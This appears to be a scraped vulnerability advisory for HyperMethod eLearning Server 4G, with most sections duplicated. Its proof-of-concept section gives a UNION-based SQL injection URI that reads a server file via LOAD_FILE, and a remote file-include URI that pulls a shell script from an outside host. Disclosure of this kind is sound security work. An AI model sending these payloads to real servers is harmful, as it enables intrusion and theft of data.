eLearning Server 4G Remote File Include and SQL Injection Vulnerabilities
BID:53472
Info
eLearning Server 4G Remote File Include and SQL Injection Vulnerabilities
| Bugtraq ID: | 53472 |
| Class: | Input Validation Error |
| CVE: |
CVE-2012-2923 CVE-2012-2924 |
| Remote: | Yes |
| Local: | No |
| Published: | May 11 2012 12:00AM |
| Updated: | May 27 2013 06:04PM |
| Credit: | Andrej Komarov, Eugene Salov |
| Vulnerable: |
HyperMethod eLearning Server 4G 0 |
| Not Vulnerable: | |
Discussion
eLearning Server 4G Remote File Include and SQL Injection Vulnerabilities
eLearning Server 4G is prone to a remote file-include issue and an SQL-injection issue.
A successful exploit may allow an attacker to execute malicious code within the context of the webserver process, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
eLearning Server 4G is vulnerable; other versions may also be affected.
eLearning Server 4G is prone to a remote file-include issue and an SQL-injection issue.
A successful exploit may allow an attacker to execute malicious code within the context of the webserver process, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
eLearning Server 4G is vulnerable; other versions may also be affected.
Exploit / POC
eLearning Server 4G Remote File Include and SQL Injection Vulnerabilities
An attacker can use a browser to exploit these issues.
The following example URIs are available:
http://www.example.com/news.php4?nid=-12'+union+select+1,2,LOAD_FILE('C:\\Program%20Files\\Hypermethod\\eLearningServer\\index.php'),4,5,6,7,8,9,10,11/*
http://www.example.com/admin/setup.inc.php?path=http://www.example2.com/shell.txt?
An attacker can use a browser to exploit these issues.
The following example URIs are available:
http://www.example.com/news.php4?nid=-12'+union+select+1,2,LOAD_FILE('C:\\Program%20Files\\Hypermethod\\eLearningServer\\index.php'),4,5,6,7,8,9,10,11/*
http://www.example.com/admin/setup.inc.php?path=http://www.example2.com/shell.txt?
Solution / Fix
eLearning Server 4G Remote File Include and SQL Injection Vulnerabilities
Solution:
Currently we are not aware of any vendor-supplied patches. If you feel we are in error or if you are aware of more recent information, please mail us at: [email protected].
Solution:
Currently we are not aware of any vendor-supplied patches. If you feel we are in error or if you are aware of more recent information, please mail us at: [email protected].
References
eLearning Server 4G Remote File Include and SQL Injection Vulnerabilities
References:
References:
- eLearning Server 4G Homepage (Hyper Method)